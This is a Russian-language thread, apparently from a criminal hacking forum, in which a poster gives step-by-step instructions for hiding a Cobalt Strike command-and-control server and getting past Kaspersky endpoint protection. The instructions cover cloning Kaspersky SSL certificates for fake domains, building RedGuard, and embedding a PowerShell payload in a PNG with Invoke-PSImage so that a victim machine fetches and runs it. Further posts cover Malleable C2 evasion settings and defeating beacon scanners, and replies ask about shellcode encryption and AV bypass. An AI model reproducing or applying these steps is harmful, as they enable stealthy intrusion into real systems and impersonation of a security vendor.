Статья Hide your CobaltStrike like a PRO! & Bypass Kaspersky End Point Security AV/EDR (PART 2)

[r1z]

added.

~/ Voila! Cobalt Strike 4.5 modified Loader ( Original cobaltstrike.jar )

 

[rotorrr]

Doy

~/ Клонируем *.Kaspersky.com SSL & защищаемся против BlueTeam

В этой части мы разделим перехват SSL на 2 части:

- Клонирование SSL для вашей цели. (https://raw.githubusercontent.com/SySS-Research/clone-cert/master/clone-cert.sh)
- Интегриррование украденного SSL со скриптом C2. (https://github.com/wikiZ/RedGuard#interception-method)

Клон SSL

Некоторые компании добавляют безопасность в TLS, чтобы не загружать его, например: kaspersky.com

Если мы попытаемся загрузить его, мы получим эту ошибку:

Посмотреть вложение 37348

Чтобы обойти это, всемирная компания, такая как kaspersky, передали поддомены некоторым партнерам, которые не следуют политике безопасности, проводимой головным офисом, поэтому простое сканирование поддоменов и мы захватываем один из доверенных поддоменов касперского, а именно: me-en.kaspersky.com попробуйте клонировать SSL и увидите:

Посмотреть вложение 37349

Звучит отлично, наш SSL-сертификат Kaspersky.com готов к использованию.

Но теперь вам нужно проверить реальную информацию SSL и записать ее для нашего использования в файле конфигурации C2.

Посмотреть вложение 37350

Нажмите детали, чтобы получить больше информации.

Посмотреть вложение 37351

Во-вторых, я рекомендую, как только вы узнаете своего AV, клонировать тот же SSL компании и зарегистрировать "FAKE" домен, который вы будете использовать, когда мы создадим наш маяxчок, поэтому поймать наш маяxчок и узнать, что наш домен kaspersky.com является "фейковым", то синей команде будет сложнее анализировать это.

Также хороший способ добавить поддомен для касперского, например, dl.kasperskyetcdomain.com или kav.kasperskyetcdomain.com, етк.

- Настройка C2 / RedGuard.

Настройка для C2 довольно проста.. но самое главное здесь для нашего продвинутого OPSEC это использовать домен kaspersky.com или любой другой нужный вам домен. Перед запуском вашего тимсервера настройте redguard командой:

git clone https://github.com/wikiZ/RedGuard.git
cd RedGuard
go build -ldflags "-s -w"
chmod +x ./RedGuard&&./RedGuard

После завершения настройки вы увидите что-то вроде этого.


Посмотреть вложение 37352

Это настройка по умолчанию. Вам нужно изменить ее сейчас и перезагрузить C2.

/root/.RedGuard_CobaltStrike.ini

Посмотреть вложение 37353

Теперь давайте создадим и настроим наш слушатель ( https + http ) с C2 и убедитесь, что у вас есть собственный "FAKE" домен, в соответствии с вашим клиентом AV, EDR.

Прослушиватель http (порт 80 ---> 8080).

Прослушиватель https (порт 443 --> 4433).

Посмотреть вложение 37354

После этого вы можете проверить статус C2.

Посмотреть вложение 37355

~/ Обход Kaspersky AV / EDR 04.06.2022

Что ж, для большинства AV/EDR компаний важно отключить powershell! Это сила любой оболочки в windows...и сегодня я поделюсь общедоступным скриптом "Bypass powershell" (https://github.com/peewpw/Invoke-PSImage), который будет работать с вами.

Все мы слышали о Invoke-Image, который скрывает вредоносный код (powershell.ps1) внутри изображения (xss.jpg), но теперь мы будем работать над дублированием шифрования изображения.

Я не буду больше объяснять, что наиболее важно импортировать скрипт Invoke-PSImage (https://anonfiles.com/Hea0eanay5/Invoke-PSImage_7z) в вашу kf,e Windows.

1) откройте powershell и импортируйте Invoke-PSImage.ps1 в ваш powershell (убедитесь, что AV и Защитник Windows отключены при импорте шелл-кода):

Import-Module .\Invoke-PSImage.ps1

2) сгенерировать свой вредоносный образ

Invoke-PSImage -Script .\payload.ps1 -Out .\r1z.png -Image .\xss.jpg -Web


Посмотреть вложение 37356

3) Теперь, и важная часть, это загрузить изображение на ваш командный сервер и обновить/вставить загруженную ссылку в зашифрованную оболочку, чтобы запустить ее на клиентском компьютере.

Посмотреть вложение 37357

PNG выглядит как реальная картинка, вы можете загрузить ее в любое место на доверенном сайте или даже на клиентском сайте или на командном сервере.

Посмотреть вложение 37358

Настройте прослушиватель cobaltstrike.

Посмотреть вложение 37359

Обновите ссылку на изображение.

Посмотреть вложение 37360

Посмотреть вложение 37361

Скопируйте и вставьте закодированный в обновления скрипт powershell и запустите его в клиенте powershell.

Посмотреть вложение 37362

Дополнительный уровень усложняет поиск нашего маячка. Наша связь с клиентом будет зашифрована через SSL-связь под "поддельным" доменом Касперского, который мы выбираем

Посмотреть вложение 37363

Есть много способов и много инструментов, как OPSEC, которые вы можете использовать, но здесь я поделюсь некоторыми лучшими инструментами, которые я лично рекомендовал ,s использовать, и мы будем проходить их шаг за шагом, пока не достигнем нашей цели в обходе последнего обновления на Kaspersky End Point Security & Network moniter с нашим CobaltStrike 4.5

Теперь ваши шаги по обфускации в вашем проекте DLL и IDEA. Маячокк не собирается сливать информацию и будет напоминать держаться подальше от всех исследований "NCCGroup" и прочей ерунды)) Следующие маячки будут более сильными в сокрытии OPSEC.

Проверьте модифицированный файл beacon.dll с помощью любого из сканеров маячков, например:

GitHub - CCob/BeaconEye: Hunts out CobaltStrike beacons and logs operator command output

Hunts out CobaltStrike beacons and logs operator command output - CCob/BeaconEye

github.com

https://github.com/Apr4h/CobaltStrikeScan

Посмотреть вложение 37364

Я хочу поделиться наиболее полной конфигурацией OpSec в вашем (Malleable C2), чтобы убедиться, что настроены следующие параметры, которые ограничивают использование памяти с RWX-флагом (подозрительной и легко обнаруживаемой) и очищают шелл-код после запуска маячка:

• set startrwx "false";
• set userwx "false";
• set cleanup "true";
• set stomppe "true";
• set obfuscate "true";
• set sleep_mask "true";
• set smartinject "true";

Большинство EDR, AV работают с одной и той же контрольной суммой, проверкой хэша, проверкой API, етк. Настройка вашего профиля, что является наиболее важной частью, чтобы скрыть вашу активность в любой системе EDR, все они работают одинаково, и я буду рассказывать, как обойти это в будущем.

** Наш рецепт супа: ヽ (# `Д ●) ﾉ

- Nmap сканер. (блокировано) ✔
- BeaconEye сканер (блокировано) ✔
- Cobalt парсер. (блокировано) ✔
- Скрытый URI aka checksum8. (скрыто) ✔
- Скрытие тимсервера через тунель CloudFlared ✔
- Steal *.Kaspersky.com SSL. (обойдено) ✔
- Bypass Kaspersky End Point Security. (обойдено) ✔
- Установка TOR через Teamserver (Мои HCS тулзы ).
- Установка OpenVPN с редиректором redirector (Мои HCS тулзы).
- Установка DNSCrypt (DoH) через CloudFlare. (Мои HCS тулзы).
- Установка Domains рандомизатор (Мои HCS тулзы).
- Установка JARM рандомизатор aka JA3's обфускатор (Мои HCS тулзы).
- Установка автоматического скрипта для кастомного кобальта 4.4 + 4.5 (Мои HCS тулзы).

** дополнительный скрытый OPSEC в подписи JARM, обфускатор aja JA3, интеграция VPN с перенаправлениями, настраиваемый XSS cobaltstrike 4.5 Edition и другие советы и рекомендации по OPSEC будут добавляться каждый месяц в сценарий HCS All-In-One!

Пароль на файл: r1z@xss.pro

!!!ОСТАВАЙТЕСЬ НА СВЯЗИ И СЛЕДИТЕ ЗА ОБНОВЛЕНИЯМИ!!!
.

 

[rotorrr]

Doy

any Red guard alternatives though

 

[r1z]

any Red guard alternatives though

There is, but why ? i believe this tool is gathering most of OPSEC needed and others similor's tools features.

also by this tool you can clone any vulnerable site/company and make fake domain with clonning SSL, enable SNI encryption will hide your domain fronting IP address with CDN services...

what the features you looking for to implement as a OPSEC and what's hard in the installation or configuration of Red guard ?

 

[Alonebalone]

Скорей бы скрипт пощупать

 

[rotorrr]

There is, but why ? i believe this tool is gathering most of OPSEC needed and others similor's tools features.

also by this tool you can clone any vulnerable site/company and make fake domain with clonning SSL, enable SNI encryption will hide your domain fronting IP address with CDN services...

what the features you looking for to implement as a OPSEC and what's hard in the installation or configuration of Red guard ?

actually after some time it might get bad though but i do get , this has alot of opsec to it too

have you got ideas on java script shellcode encryption and decryption using JavaScript though

thanks

 

[r1z]

actually after some time it might get bad though but i do get , this has alot of opsec to it too

have you got ideas on java script shellcode encryption and decryption using JavaScript though

thanks

Yes, but this is something different than C2, will add it on to-do list later on.

but you can check this.

 

[rotorrr]

Yes, but this is something different than C2, will add it on to-do list later on.

but you can check this.

thanks av caught it too but yer its a great work

 

[r1z]

thanks av caught it too but yer its a great work

You can play with it, easy to bypass with JS.

 

[rotorrr]

You can play with it, easy to bypass with JS.

how then have you got any ideas to how that could be done also how can i PM you too

 

[r1z]

To play with AV and bypass them, use this online tool.

 

[2fast]

Hello Bro, I working on modified cobaltstrike. From version 4.2 coba govoryat stuchit

 

[r1z]

i dont understood ? you want some assistent or you prefer use CS 4.2 ?

 

[Woke]

Hi bro,

I am following instructions to modify CS 4.4. I use openjdk 18 downloaded from https://jdk.java.net/18/

I can build the artifact under SDK 18 in IDEA, but when I run it for the client, I get this error:

$ java -jar CS44mod.jar
Exception in thread "main" java.lang.NoClassDefFoundError: sun/swing/plaf/synth/SynthIcon
   at java.base/java.lang.ClassLoader.defineClass1(Native Method)
   at java.base/java.lang.ClassLoader.defineClass(ClassLoader.java:1013)
   at java.base/java.security.SecureClassLoader.defineClass(SecureClassLoader.java:150)
   at java.base/jdk.internal.loader.BuiltinClassLoader.defineClass(BuiltinClassLoader.java:862)
   at java.base/jdk.internal.loader.BuiltinClassLoader.findClassOnClassPathOrNull(BuiltinClassLoader.java:760)
   at java.base/jdk.internal.loader.BuiltinClassLoader.loadClassOrNull(BuiltinClassLoader.java:681)
   at java.base/jdk.internal.loader.BuiltinClassLoader.loadClass(BuiltinClassLoader.java:639)
   at java.base/jdk.internal.loader.ClassLoaders$AppClassLoader.loadClass(ClassLoaders.java:188)

I can build the artifact with SDK 1.8, and install openjdk-8-jdk, then I can run the client (but it error message pop-up says that 1.8 is not supported).

Maybe it is because the sun.swing.plaf.synth.SynthIcon is from Oracle JRE, and this JRE is no longer included in the openjdk 11+ release. Do you have any suggestions on how to fix this error? Do I need to download the jre 18 from Oracle? Thanks

 

[r1z]

Yes download it and choise from this command.

update-alternatives --config java

 

[badabbomm]

Лучший. Однозначно за тебя!

 

[Maxim_Petrov]

Hi, I wanted to get an update about your HCS tool. Is it available?

 

[r1z]

Still in development for Ubuntu destro, will be released a month later.

 

[Maxim_Petrov]

Ok! Thanks for the update

Still in development for Ubuntu destro, will be released a month later

 

[Alonebalone]

круто бро) даже Zer0day паблик это на их канале))

Посмотреть вложение 38361

+++++1

Zer0Day Lab скамер так что ты по аккуратнее с рекламой пабликов таких